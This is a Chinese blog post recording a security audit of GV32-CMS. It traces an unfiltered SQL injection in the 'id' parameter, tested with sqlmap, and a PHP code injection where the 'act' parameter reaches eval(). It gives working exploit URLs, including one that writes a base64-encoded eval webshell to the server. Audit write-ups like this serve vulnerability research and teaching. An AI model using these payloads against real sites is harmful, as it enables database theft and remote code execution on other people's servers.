企业资讯
- 企业新闻
- 行业文章

GV32-CMS代码审计记录

现在的cms大多数都是mvc架构，也就是model+view+cotroll。

接收并处理参数的在c层，跟数据库的交互则在m层，页面表现在v层。层次分明可以更好的进行审计。这里我主要查找的是sql注入漏洞。注入漏洞的成因就是因为没有对传进来的参数进行过滤。

首先是白盒

以这个CMS为例，,applicationwww文件夹里面的东西是controll层。用netbeans载入项目后右击www文件夹搜索$_GET[、$_POST[、$_COOKIE[、$_REQUEST[，查看接收了哪些参数。（这里只有$_REQUEST有结果）

 $smdirid         = trim($_REQUEST["id"]).trim($_REQUEST["pageNum"]); $GLOBALS['Templ'] -&gt; cache_dir = ROOT_PATH.$GLOBALS['cache_path'].’/’.$GLOBALS['Helpe'] -&gt; buildsmartydir( $typeu = ‘n’,$smdirid);

1 2	$smdirid = trim($_REQUEST[“id”]).trim($_REQUEST[“pageNum”]); $GLOBALS[‘Templ’] -> cache_dir = ROOT_PATH.$GLOBALS[‘cache_path’].‘/’.$GLOBALS[‘Helpe’] -> buildsmartydir( $typeu = ‘n’,$smdirid);

没有看到熟悉的select语句，那看看buildsmartydir这个函数的定义。点击buildsmartydir高亮后Ctrl+B转到声明处。

同时查看下网页上可见的连接。http://127.0.0.1/?load=art&act=detail&id=10，于是我选择了art.php进行分析。

双击跳转到选定的代码处，21列。

 $smdirid         = trim($_REQUEST["id"]).trim($_REQUEST["pageNum"]); $GLOBALS['Templ'] -&gt; cache_dir = ROOT_PATH.$GLOBALS['cache_path'].’/’.$GLOBALS['Helpe'] -&gt; buildsmartydir( $typeu = ‘n’,$smdirid);

1 2	$smdirid = trim($_REQUEST[“id”]).trim($_REQUEST[“pageNum”]); $GLOBALS[‘Templ’] -> cache_dir = ROOT_PATH.$GLOBALS[‘cache_path’].‘/’.$GLOBALS[‘Helpe’] -> buildsmartydir( $typeu = ‘n’,$smdirid);

没有看到熟悉的select语句，那看看buildsmartydir这个函数的定义。点击buildsmartydir高亮后Ctrl+B转到声明处。

         function getdirs( $dir )      {          $array = array();          $d = @dir($dir);          if($d)          {                while (false !== ($entry = $d-&gt;read()))                 {                    if($entry!=’.’ &amp;&amp; $entry!=’..’)                     {                        $back = $entry;                                            $entry = $dir.’/’.$entry;                                             if(is_dir($entry))                         {                            $array[] = $back;                        }                    }                }                $d-&gt;close();          }          return $array;      }

function getdirs( $dir )

{

$array = array();

$d = @dir($dir);

if($d)

{

while (false !== ($entry = $d->read()))

{

if($entry!=‘.’ && $entry!=‘..’)

{

$back = $entry;

$entry = $dir.‘/’.$entry;

if(is_dir($entry))

{

$array[] = $back;

}

$d->close();

}

return $array;

}

没有发现跟数据库有关的东西，遂看下一个参数，这里我选择$id（这个参数很常见于数字型sql注入中）

                 if($id &gt; 0 )                 {                         $sqlQuery                 = ” SELECT a.* ,s.ars_name  FROM  “.SQL_PREFIX.”artlice as a ,”.SQL_PREFIX.”artsort  as s  WHERE a.ars_id = s.ars_id and a.art_enabled = 1  and a.art_id = &lt;b&gt;”.$id.”&lt;/b&gt; ORDER BY a.`art_id`  “;                         $infodetail         = $GLOBALS['MySql'] -&gt; selectOne($sqlQuery);

if($id > 0 )

{

$sqlQuery = ” SELECT a.* ,s.ars_name FROM ”.SQL_PREFIX.“artlice as a ,”.SQL_PREFIX.“artsort as s WHERE a.ars_id = s.ars_id and a.art_enabled = 1 and a.art_id = <b>”.$id.“</b> ORDER BY a.`art_id` ”;

$infodetail = $GLOBALS[‘MySql’] -> selectOne($sqlQuery);

这边的$id没有进行任何过滤，而且两边也没加上单引号就直接带入selectOne里面的，但是得看下selectOne里面有没有过滤。跳到它的声明看看

     function selectOne($sqlQuery, $typemysql = “MYSQL_ASSOC”)     {             $this -&gt; connectMySql();             $this -&gt; query = mysql_query($sqlQuery, $this -&gt; mysqlConncet)                           or die ( mysql_error());         //$result = array();             if($typemysql == “MYSQL_NUM”)             {                    $row = mysql_fetch_array( $this -&gt; query, MYSQL_NUM);                    //while($row = mysql_fetch_array( $this -&gt; query, MYSQL_NUM)) //MYSQL_NUM                    //{                       $result = $row;                    //}              }else{                          $row = mysql_fetch_array( $this -&gt; query, MYSQL_ASSOC);                     //while($row = mysql_fetch_array( $this -&gt; query, MYSQL_ASSOC) ) //MYSQL_ASSOC                    //{                       $result = $row;                       //}              }              return $this -&gt; one = $result;              //return true; }

function selectOne($sqlQuery, $typemysql = “MYSQL_ASSOC”)

{

$this -> connectMySql();

$this -> query = mysql_query($sqlQuery, $this -> mysqlConncet)

or die ( mysql_error());

//$result = array();

if($typemysql == “MYSQL_NUM”)

{

$row = mysql_fetch_array( $this -> query, MYSQL_NUM);

//while($row = mysql_fetch_array( $this -> query, MYSQL_NUM)) //MYSQL_NUM

//{

$result = $row;

//}

}else{

$row = mysql_fetch_array( $this -> query, MYSQL_ASSOC);

//while($row = mysql_fetch_array( $this -> query, MYSQL_ASSOC) ) //MYSQL_ASSOC

//{

$result = $row;

//}

}

return $this -> one = $result;

//return true;

}

好的，selectOne里面也没有过滤，那到实际页面看下是不是可以注入。

sj4

 You have anerror in your SQL syntax; check the manual that corresponds to your MySQLserver version for the right syntax to use near ” ORDER BY a.`art_id`’ at line1

1	You have anerror in your SQL syntax; check the manual that corresponds to your MySQLserver version for the right syntax to use near ” ORDER BY a.`art_id`‘ at line1

（我这里的环境是php5.3，gpc=off，根据上面的结果判断这应该是个数字型的注入，所以就算单引号被转义也没关系）这里我不会一句话爆出管理员密码啥的，因为大部分的注入我都是用sqlmap解决。

 Python sqlmap.py–u http://127.0.0.1/?load=art&amp;act=detail&amp;id=10–p id

1	Python sqlmap.py–u http://127.0.0.1/?load=art&act=detail&id=10–p id

sj5

同时我也使用wvs对网站进行扫描（黑盒，然后发现了更为惊人的结果）

sj6

这里发现一个php codeinjection，也就是php代码注入。看下它的检查结果。

 URL encoded GET input act was set to ${@print(md5(acunetix_wvs_security_test))} Possible execution result: 63c19a6da79816b21429e5bb262daed8

URL encoded GET input act was set to ${@print(md5(acunetix_wvs_security_test))}

Possible execution result:

63c19a6da79816b21429e5bb262daed8

也就是访问

 http://127.0.0.1/?act=%24%7b%40print(md5(acunetix_wvs_security_test))%7d&amp;load=art

1	http://127.0.0.1/?act=%24%7b%40print(md5(acunetix_wvs_security_test))%7d&load=art

页面会显示63c19a6da79816b21429e5bb262daed8。很明显，print被执行了。本着知根知底的精神，经过一番查找，在systemclassclass_url.php里面找到了loadact()方法。

 ……[indent]                                $needact = $GLOBALS['Reque'] -&gt; getval["act"];                                 if($needact)                                 {                                         //加载执行程序控制操作类文件                                         $actfile = “[        DISCUZ_CODE_5        ]quot;.ucwords($actfile);                                         $actval =  $actfile.’-&gt;’.$needact.’(); ‘ ;                                         eval($actval);                                 }[/indent]……

……[indent] $needact = $GLOBALS[‘Reque’] -> getval[“act”];

if($needact)

{

//加载执行程序控制操作类文件

$actfile = “[ DISCUZ_CODE_5 ]quot;.ucwords($actfile);

$actval = $actfile.‘->’.$needact.‘(); ‘ ;

eval($actval);

}[/indent]……

看到eval就明白了。带进来的act参数被执行了。

 $this -&gt; getval  = $this -&gt; funReq($_GET);

1	$this -> getval = $this -> funReq($_GET);

（白盒的方式有两种流，一种是检查所有输入，另一种是根据危险函数反向，这里可以依据eval反向出act有问题）但我并不满足于print，要是能拿个webshell那不是更好。最初的想法是

 http://127.0.0.1/?load=pic&amp;act=${@eval($_POST[a])}

1	http://127.0.0.1/?load=pic&act=${@eval($_POST[a])}

，可惜菜刀无法连接……然后才想到干脆直接写入webshell。

 http://127.0.0.1/load=pic&amp;act=${file_put_contents(%22xxxx.php%22,%20base64_decode(‘PD9waHAgQGV2YWwoJF9QT1NUW0NDXSk/Pg==’))}

1	http://127.0.0.1/load=pic&act=${file_put_contents(%22xxxx.php%22,%20base64_decode(‘PD9waHAgQGV2YWwoJF9QT1NUW0NDXSk/Pg==’))}

sj7

到这里我的审计就结束了。php的应用漏洞不止注入、xss等，也有上传，包含、逻辑问题等。（目前我只会找注入）。黑盒跟白盒的结合效果不错。

审计需要的是耐心，但也许看完一整套代码，虽没发现任何可以利用的漏洞，可也学会了如何去防范。

注：90sec确实是圈内不错的安全论坛，还没有论坛账号的同学抓紧申请注册吧：）

91ri.org：小编们最近都在忙着做线下的项目，网站更新的速度较慢，还请各位读者见谅。也希望有着分享精神的同学能给我们投稿，投稿的文章会在工作时间的6小时内审核并发送审核结果到你的邮箱里。

同时在最近几天团队内会出一篇关于android安全的文章，敬请期待~

鸿大千秋网站建设团队敬上